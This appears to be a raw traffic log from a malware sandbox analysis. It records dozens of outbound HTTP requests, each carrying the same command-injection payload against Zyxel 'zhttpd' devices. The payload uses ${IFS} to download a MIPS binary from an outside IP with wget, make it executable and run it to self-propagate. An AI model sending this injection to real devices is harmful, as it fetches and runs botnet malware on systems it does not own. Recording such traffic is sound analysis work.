                                          Jan 14, 2024 15:46:27.248892069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6992192.168.2.2337042159.139.32.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248935938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6993192.168.2.2352440140.9.250.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248951912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6994192.168.2.2360980103.120.96.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248967886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6995192.168.2.233942898.26.218.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248995066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6996192.168.2.235232231.229.19.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249030113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6997192.168.2.2358316159.4.147.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249053001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6998192.168.2.2337394142.9.0.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249073982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6999192.168.2.234396887.122.183.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249110937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7000192.168.2.2338400107.194.183.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249123096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7001192.168.2.2339686133.180.123.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249177933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7002192.168.2.2356696105.208.165.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249213934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7003192.168.2.2359178223.233.183.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249213934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7004192.168.2.2359336205.91.231.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249264956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7005192.168.2.2355700211.179.244.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249272108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7006192.168.2.235716697.155.216.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249306917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7007192.168.2.235312861.195.85.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249330044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7008192.168.2.2336842189.32.210.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249341965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7009192.168.2.2352426157.158.49.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249371052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7010192.168.2.2345956182.7.61.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249383926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7011192.168.2.2357634149.152.109.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249430895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7012192.168.2.2343594123.85.136.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249430895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7013192.168.2.233492268.219.152.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249483109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7014192.168.2.2360874134.183.136.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249512911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7015192.168.2.233978836.176.251.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249536991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7016192.168.2.2356658207.112.214.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249553919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7017192.168.2.235096412.118.179.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249583960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7018192.168.2.2358444174.0.87.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249605894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7019192.168.2.2354722216.89.159.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249655962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7020192.168.2.2346536160.226.93.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249691963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7021192.168.2.235599265.249.11.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249702930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7022192.168.2.233546867.31.209.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249722958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7023192.168.2.234882625.173.53.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249742985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7024192.168.2.2359348121.218.33.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249780893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7025192.168.2.2356748185.219.232.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249787092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7026192.168.2.2336300114.35.67.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249819040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7027192.168.2.234896075.193.18.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249850035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7028192.168.2.235842213.163.206.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249866962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7029192.168.2.234996688.141.104.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249891043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7030192.168.2.2348786208.242.13.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249932051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7031192.168.2.2333166208.212.230.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249959946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7032192.168.2.234551013.251.255.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.249979973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7033192.168.2.233798843.198.203.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250006914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7034192.168.2.2341612145.52.251.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250046968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7035192.168.2.2359894185.52.212.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250062943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7036192.168.2.2341882145.214.177.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250085115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7037192.168.2.2334160134.237.78.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250125885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7038192.168.2.233947420.210.158.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250155926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7039192.168.2.233715059.15.171.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250180006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7040192.168.2.2345040118.70.195.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250199080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7041192.168.2.235034499.76.184.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250241995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7042192.168.2.2356942216.128.29.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250260115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7043192.168.2.2350766181.208.151.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250284910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7044192.168.2.234295850.213.158.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250319958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7045192.168.2.233943270.108.112.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250350952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7046192.168.2.234774653.28.144.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250363111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7047192.168.2.2334248217.30.15.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250405073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7048192.168.2.233549879.46.92.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250442028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7049192.168.2.2337482171.8.67.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250462055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7050192.168.2.233891642.0.212.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250477076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7051192.168.2.235726434.133.239.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250489950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7052192.168.2.234451468.7.251.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250540972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7053192.168.2.2355892136.246.58.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.250561953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7054192.168.2.2344876146.227.107.143443
                                          TimestampBytes transferredDirectionData
